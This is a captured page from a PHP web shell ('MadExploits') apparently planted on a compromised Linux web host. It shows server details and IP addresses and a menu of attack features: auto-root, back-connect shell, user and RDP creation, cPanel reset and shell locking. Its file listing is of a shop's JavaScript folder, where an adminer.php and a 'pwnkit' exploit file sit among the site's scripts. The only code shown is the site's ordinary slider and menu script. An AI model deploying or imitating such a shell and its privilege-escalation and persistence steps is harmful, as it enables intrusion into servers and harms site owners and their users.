Linux web15f56.uni5.net 5.4.282-1.el8.elrepo.x86_64 #1 SMP Mon Aug 19 18:33:22 EDT 2024 x86_64
Apache
: 187.1.136.155 | : 216.73.216.129
Cant Read [ /etc/named.conf ]
7.4.33
argiplam
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
argiplam /
www /
carrinho /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
adminer.php
465.43
KB
-rw-r--r--
cart_custom.js
1.97
KB
-rw-r--r--
categories_custom.js
5.61
KB
-rw-r--r--
checkout_custom.js
1.32
KB
-rw-r--r--
contact_custom.js
3.52
KB
-rw-r--r--
custom.js
3.49
KB
-rw-r--r--
jquery-3.2.1.min.js
84.63
KB
-rw-r--r--
modernizr.custom.79639.js
4.74
KB
-rw-r--r--
product_custom.js
2.34
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : custom.js
/* JS Document */ /****************************** [Table of Contents] 1. Vars and Inits 2. Set Header 3. Init Menu 4. Init Home Slider 5. Init Gallery 6. Init Testimonials Slider 7. Init Lightbox ******************************/ $(document).ready(function() { "use strict"; /* 1. Vars and Inits */ var header = $('.header'); var menuActive = false; var menu = $('.menu'); var burger = $('.burger_container'); setHeader(); $(window).on('resize', function() { setHeader(); }); $(document).on('scroll', function() { setHeader(); }); initHomeSlider(); initMenu(); initGallery(); initTestSlider(); initLightbox(); /* 2. Set Header */ function setHeader() { if($(window).scrollTop() > 100) { header.addClass('scrolled'); } else { header.removeClass('scrolled'); } } /* 3. Init Menu */ function initMenu() { if($('.menu').length) { var menu = $('.menu'); if($('.burger_container').length) { burger.on('click', function() { if(menuActive) { closeMenu(); } else { openMenu(); $(document).one('click', function cls(e) { if($(e.target).hasClass('menu_mm')) { $(document).one('click', cls); } else { closeMenu(); } }); } }); } } } function openMenu() { menu.addClass('active'); menuActive = true; } function closeMenu() { menu.removeClass('active'); menuActive = false; } /* 4. Init Home Slider */ function initHomeSlider() { if($('.home_slider').length) { var homeSlider = $('.home_slider'); homeSlider.owlCarousel( { items:1, autoplay:true, loop:true, nav:false, smartSpeed:1200 }); // Custom Navigation if($('.home_slider_next').length) { var next = $('.home_slider_next'); next.on('click', function() { homeSlider.trigger('next.owl.carousel'); }); } /* Custom dots events */ if($('.home_slider_custom_dot').length) { $('.home_slider_custom_dot').on('click', function(ev) { var dot = $(ev.target); $('.home_slider_custom_dot').removeClass('active'); dot.addClass('active'); homeSlider.trigger('to.owl.carousel', [$(this).index(), 300]); }); } /* Change active class for dots when slide changes by nav or touch */ homeSlider.on('changed.owl.carousel', function(event) { $('.home_slider_custom_dot').removeClass('active'); $('.home_slider_custom_dots li').eq(event.page.index).addClass('active'); }); } } /* 5. Init Gallery */ function initGallery() { if($('.gallery_slider').length) { var gallerySlider = $('.gallery_slider'); gallerySlider.owlCarousel( { items:6, loop:true, margin:22, autoplay:true, nav:false, dots:false, responsive: { 0: { margin:7, items:3 }, 575: { margin:7, items:6 }, 991: { margin:22, items:6 } } }); } } /* 6. Init Testimonials Slider */ function initTestSlider() { if($('.test_slider').length) { var testSlider = $('.test_slider'); testSlider.owlCarousel( { items:1, loop:true, autoplay:true, smartSpeed:1200, nav:false, dots:false }); } } /* 7. Init Lightbox */ function initLightbox() { if($('.gallery_item').length) { $('.colorbox').colorbox( { rel:'colorbox', photo: true, maxWidth:'95%', maxHeight:'95%' }); } } });
Close